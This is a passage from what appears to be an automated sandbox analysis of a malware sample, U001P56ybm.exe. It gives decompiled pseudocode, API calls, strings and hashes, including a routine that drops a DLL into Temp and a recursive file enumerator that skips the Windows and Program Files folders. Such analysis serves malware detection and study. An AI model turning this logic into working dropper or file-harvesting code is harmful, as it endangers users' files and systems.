                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 1404258612-0
                    • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                    • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                    • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                    • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 08af8ea28dc8ceacf7315972b2101681c3539d15064f37e91d06e90b4030418e
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 7701253640014EFFCF529E84DC428EE3F62FB1C396B598555FA595C021D237D9B1AB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004054B2(char _a4) {
                    				CHAR* _t3;
                    				char* _t5;
                    				CHAR* _t7;
                    				CHAR* _t8;
                    				void* _t10;
                    
                    				_t1 =  &_a4; // 0x405264
                    				_t8 =  *_t1;
                    				_t7 = CharNextA(_t8);
                    				_t3 = CharNextA(_t7);
                    				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                    					if( *_t8 != 0x5c5c) {
                    						L8:
                    						return 0;
                    					}
                    					_t10 = 2;
                    					while(1) {
                    						_t10 = _t10 - 1;
                    						_t5 = E00405449(_t3, 0x5c);
                    						if( *_t5 == 0) {
                    							goto L8;
                    						}
                    						_t3 = _t5 + 1;
                    						if(_t10 != 0) {
                    							continue;
                    						}
                    						return _t3;
                    					}
                    					goto L8;
                    				} else {
                    					return CharNextA(_t3);
                    				}
                    			}
                    0x004054bb
                    0x004054bb
                    0x004054c2
                    0x004054c5
                    0x004054ca
                    0x004054dd
                    0x004054f7
                    0x00000000
                    0x004054f7
                    0x004054e1
                    0x004054e2
                    0x004054e5
                    0x004054e6
                    0x004054ee
                    0x00000000
                    0x00000000
                    0x004054f0
                    0x004054f3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004054f3
                    0x00000000
                    0x004054d3
                    0x00000000
                    0x004054d4

                    APIs
                    • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004054C0
                    • CharNextA.USER32(00000000), ref: 004054C5
                    • CharNextA.USER32(00000000), ref: 004054D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CharNext
                    • String ID: dR@
                    • API String ID: 3213498283-1322173608
                    • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                    • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                    • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                    • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E00401D1B() {
                    				void* __esi;
                    				int _t6;
                    				signed char _t11;
                    				struct HFONT__* _t14;
                    				void* _t18;
                    				void* _t24;
                    				void* _t26;
                    				void* _t28;
                    
                    				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                    				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                    				 *0x40af8c = E004029CB(3);
                    				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                    				 *0x40af93 = 1;
                    				 *0x40af90 = _t11 & 0x00000001;
                    				 *0x40af91 = _t11 & 0x00000002;
                    				 *0x40af92 = _t11 & 0x00000004;
                    				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                    				_t14 = CreateFontIndirectA(0x40af7c);
                    				_push(_t14);
                    				_push(_t26);
                    				E00405889();
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                    				return 0;
                    			}
                    0x00401d29
                    0x00401d42
                    0x00401d4c
                    0x00401d51
                    0x00401d5c
                    0x00401d63
                    0x00401d75
                    0x00401d7b
                    0x00401d80
                    0x00401d8a
                    0x004024aa
                    0x00401561
                    0x00402825
                    0x00402880
                    0x0040288c

                    APIs
                    • GetDC.USER32(?), ref: 00401D22
                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                    • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirect
                    • String ID:
                    • API String ID: 3272661963-0
                    • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                    • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                    • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                    • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: _memcmp
                    • String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
                    • API String ID: 2931989736-219090540
                    • Opcode ID: dee45c249a8b75032fa1bb4b3cdcab11e2839b3157a9203bba29101f923570f7
                    • Instruction ID: 155de57182236232f910310e9f0cd9fb0c5bf3b36f1450f6f00a1bd75578b52a
                    • Opcode Fuzzy Hash: dee45c249a8b75032fa1bb4b3cdcab11e2839b3157a9203bba29101f923570f7
                    • Instruction Fuzzy Hash: FC1154F9D00109BBEB10DE98DD46FAE33A8DB45344F108128FD099B246E675EA94DB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				long _t22;
                    
                    				if(_a8 != 0x102) {
                    					if(_a8 != 0x200) {
                    						_t22 = _a16;
                    						L7:
                    						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
                    							 *0x429fc0 = _t22;
                    							E0040592B(0x429fd8, 0x42f000);
                    							E00405889(0x42f000, _t22);
                    							E0040140B(6);
                    							E0040592B(0x42f000, 0x429fd8);
                    						}
                    						L11:
                    						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t22 = _a16;
                    						goto L11;
                    					}
                    					_t22 = E00404598(_a4, 1);
                    					_a8 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E00403D29(0x413);
                    				return 0;
                    			}
                    0x00404c25
                    0x00404c4a
                    0x00404c6a
                    0x00404c6d
                    0x00404c70
                    0x00404c87
                    0x00404c8d
                    0x00404c94
                    0x00404c9b
                    0x00404ca2
                    0x00404ca7
                    0x00404cad
                    0x00000000
                    0x00404cbd
                    0x00404c57
                    0x00404caa
                    0x00404caa
                    0x00000000
                    0x00404caa
                    0x00404c63
                    0x00404c65
                    0x00000000
                    0x00404c65
                    0x00404c2b
                    0x00000000
                    0x00000000
                    0x00404c32
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32 ref: 00404C4F
                    • CallWindowProcA.USER32 ref: 00404CBD
                      • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                    • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                    • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                    • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • unsupported interface: %s, xrefs: 10002F65
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: bb5d88d6cdf7618ba146592c6a9651e3403649e95444aff9d86a8c3adaea291b
                    • Instruction ID: 376803f9b6cd03f4d3cadd785aa3c846a8ad5edfc35f26e6f9bfc6bfbb7498cf
                    • Opcode Fuzzy Hash: bb5d88d6cdf7618ba146592c6a9651e3403649e95444aff9d86a8c3adaea291b
                    • Instruction Fuzzy Hash: C0112AB9900209AFEB00DF60DC45FAE77B5EB49380F108468F9199B385D775EA90CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • unsupported interface: %s, xrefs: 10002C05
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: 80759d18eaf17e604566ee0e5978b2585ecc03b8fcbc2e55147d9b1dab74aa11
                    • Instruction ID: 760502f69ff5a67b9f1a9b5b43ffb384ee39693a39a9ce54f4b70e5547f58f8e
                    • Opcode Fuzzy Hash: 80759d18eaf17e604566ee0e5978b2585ecc03b8fcbc2e55147d9b1dab74aa11
                    • Instruction Fuzzy Hash: 5F112EB9900208ABE700DF64DC45FED77A4EB45380F108568F9055B345E775EA90CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                    				int _t5;
                    				long _t7;
                    				struct _OVERLAPPED* _t11;
                    				intOrPtr* _t15;
                    				void* _t17;
                    				int _t21;
                    
                    				_t15 = __esi;
                    				_t11 = __ebx;
                    				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                    					_t7 = lstrlenA(E004029E8(0x11));
                    				} else {
                    					E004029CB(1);
                    					 *0x409f78 = __al;
                    				}
                    				if( *_t15 == _t11) {
                    					L8:
                    					 *((intOrPtr*)(_t17 - 4)) = 1;
                    				} else {
                    					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll", _t7, _t17 + 8, _t11);
                    					_t21 = _t5;
                    					if(_t21 == 0) {
                    						goto L8;
                    					}
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                    				return 0;
                    			}
                    Instruction addresses: 0x004024b0, 0x004024b0, 0x004024b3, 0x004024ce, 0x004024b5, 0x004024b7, 0x004024bc, 0x004024c3, 0x004024d5, 0x0040264e, 0x0040264e, 0x004024db, 0x004024ed, 0x004015a6, 0x004015a8, 0x00000000, 0x004015ae, 0x004015a8, 0x00402880, 0x0040288c

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll, xrefs: 004024BC, 004024E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FileWritelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                    • API String ID: 427699356-706998987
                    • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                    • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                    • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                    • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405465(char* _a4) {
                    				char* _t3;
                    				char* _t5;
                    
                    				_t5 = _a4;
                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                    				while( *_t3 != 0x5c) {
                    					_t3 = CharPrevA(_t5, _t3);
                    					if(_t3 > _t5) {
                    						continue;
                    					}
                    					break;
                    				}
                    				 *_t3 =  *_t3 & 0x00000000;
                    				return  &(_t3[1]);
                    			}
                    Instruction addresses: 0x00405466, 0x00405470, 0x00405472, 0x00405479, 0x00405481, 0x00000000, 0x00000000, 0x00000000, 0x00405481, 0x00405483, 0x00405488

                    APIs
                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 0040546B
                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\U001P56ybm.exe,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405479
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CharPrevlstrlen
                    • String ID: C:\Users\user\Desktop
                    • API String ID: 2709904686-1669384263
                    • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                    • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405577(CHAR* _a4, CHAR* _a8) {
                    				int _t10;
                    				int _t15;
                    				CHAR* _t16;
                    
                    				_t15 = lstrlenA(_a8);
                    				_t16 = _a4;
                    				while(lstrlenA(_t16) >= _t15) {
                    					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                    					_t10 = lstrcmpiA(_t16, _a8);
                    					if(_t10 == 0) {
                    						return _t16;
                    					}
                    					_t16 = CharNextA(_t16);
                    				}
                    				return 0;
                    			}
                    Instruction addresses: 0x00405583, 0x00405585, 0x004055ad, 0x00405592, 0x00405597, 0x004055a2, 0x00000000, 0x004055bf, 0x004055ab, 0x004055ab, 0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    C-Code - Quality: 85%
                    			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				struct _WIN32_FIND_DATAW _v596;
                    				void* __ebx;
                    				void* _t35;
                    				int _t43;
                    				void* _t52;
                    				int _t56;
                    				intOrPtr _t60;
                    				void* _t66;
                    				void* _t73;
                    				void* _t74;
                    				WCHAR* _t98;
                    				void* _t99;
                    				void* _t100;
                    				void* _t101;
                    				WCHAR* _t102;
                    				void* _t103;
                    				void* _t104;
                    
                    				L004067C4(0xa); // executed
                    				_t72 = 0;
                    				_t100 = 0x2e;
                    				_t106 = _a16;
                    				if(_a16 == 0) {
                    					L15:
                    					_push(_a8);
                    					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                    					_t104 = _t103 + 0xc;
                    					if(_t98 == 0) {
                    						L30:
                    						__eflags = 0;
                    						return 0;
                    					}
                    					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                    					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                    					_t73 = _t35;
                    					if(_t73 == 0xffffffff) {
                    						L29:
                    						E00402BAB(_t98);
                    						goto L30;
                    					}
                    					L17:
                    					while(1) {
                    						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                    							if(_v596.dwFileAttributes != 0x10) {
                    								L21:
                    								_push( &(_v596.cFileName));
                    								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                    								_t104 = _t104 + 0xc;
                    								if(_t101 == 0) {
                    									goto L24;
                    								}
                    								if(_a12 == 0) {
                    									E00402BAB(_t98);
                    									E00403BEF(_t73);
                    									return _t101;
                    								}
                    								_a12(_t101);
                    								E00402BAB(_t101);
                    								goto L24;
                    							}
                    							_t124 = _a20;
                    							if(_a20 == 0) {
                    								goto L24;
                    							}
                    							goto L21;
                    						} else {
                    							L24:
                    							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                    							_t43 = FindNextFileW(_t73,  &_v596); // executed
                    							if(_t43 == 0) {
                    								E00403BEF(_t73); // executed
                    								goto L29;
                    							}
                    							_t100 = 0x2e;
                    							continue;
                    						}
                    					}
                    				}
                    				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                    				if(_t102 == 0) {
                    					L14:
                    					_t100 = 0x2e;
                    					goto L15;
                    				}
                    				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                    				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                    				_t74 = _t52;
                    				if(_t74 == 0xffffffff) {
                    					L13:
                    					E00402BAB(_t102);
                    					_t72 = 0;
                    					goto L14;
                    				} else {
                    					goto L3;
                    				}
                    				do {
                    					L3:
                    					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                    						goto L11;
                    					}
                    					if(_a24 == 0) {
                    						L7:
                    						if(E00405D24( &(_v596.cFileName)) >= 3) {
                    							L9:
                    							_push( &(_v596.cFileName));
                    							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                    							_t103 = _t103 + 0xc;
                    							_a16 = _t60;
                    							_t115 = _t60;
                    							if(_t60 == 0) {
                    								goto L11;
                    							}
                    							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                    							E00402BAB(_a16);
                    							_t103 = _t103 + 0x1c;
                    							if(_t99 != 0) {
                    								E00402BAB(_t102);
                    								E00403BEF(_t74);
                    								return _t99;
                    							}
                    							goto L11;
                    						}
                    						_t66 = 0x2e;
                    						_t114 = _v596.cFileName - _t66;
                    						if(_v596.cFileName == _t66) {
                    							goto L11;
                    						}
                    						goto L9;
                    					}
                    					_push(L"Windows");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					_push(L"Program Files");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					goto L7;
                    					L11:
                    					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                    					_t56 = FindNextFileW(_t74,  &_v596); // executed
                    				} while (_t56 != 0);
                    				E00403BEF(_t74); // executed
                    				goto L13;
                    			}
                    Instruction addresses: 0x00403d82, 0x00403d88, 0x00403d8c, 0x00403d8d, 0x00403d90, 0x00403ea9, 0x00403ea9, 0x00403eb9, 0x00403ebb, 0x00403ec0, 0x00403f95, 0x00403f95, 0x00000000, 0x00403f95, 0x00403ece, 0x00403edb, 0x00403edd, 0x00403ee2, 0x00403f8e, 0x00403f8f, 0x00000000, 0x00403f94, 0x00000000, 0x00403ee8, 0x00403ef8, 0x00403f0a, 0x00403f12, 0x00403f18, 0x00403f26, 0x00403f28, 0x00403f2d, 0x00000000, 0x00000000, 0x00403f33, 0x00403f76, 0x00403f7c, 0x00000000, 0x00403f83, 0x00403f36, 0x00403f3a, 0x00000000, 0x00403f40, 0x00403f0c, 0x00403f10, 0x00000000, 0x00000000, 0x00000000, 0x00403f41, 0x00403f41, 0x00403f4b, 0x00403f58, 0x00403f5c, 0x00403f88, 0x00000000, 0x00403f8d, 0x00403f60, 0x00000000, 0x00403f60, 0x00403ef8, 0x00403ee8, 0x00403da3, 0x00403da9, 0x00403ea6, 0x00403ea8, 0x00000000, 0x00403ea8, 0x00403db7, 0x00403dc4, 0x00403dc6, 0x00403dcb, 0x00403e9d, 0x00403e9e, 0x00403ea4, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00403dd1, 0x00403dd1, 0x00403dd8, 0x00000000, 0x00000000, 0x00403de2, 0x00403e12, 0x00403e22, 0x00403e30, 0x00403e36, 0x00403e3f, 0x00403e44, 0x00403e47, 0x00403e4a, 0x00403e4c, 0x00000000, 0x00000000, 0x00403e63, 0x00403e65, 0x00403e6a, 0x00403e6f, 0x00403f64, 0x00403f6a, 0x00000000, 0x00403f71, 0x00000000, 0x00403e6f, 0x00403e26, 0x00403e27, 0x00403e2e, 0x00000000, 0x00000000, 0x00000000, 0x00403e2e, 0x00403dea, 0x00403df9, 0x00000000, 0x00000000, 0x00403e01, 0x00403e10, 0x00000000, 0x00000000, 0x00000000, 0x00403e75, 0x00403e7f, 0x00403e8c, 0x00403e8e, 0x00403e97, 0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Uniqueness

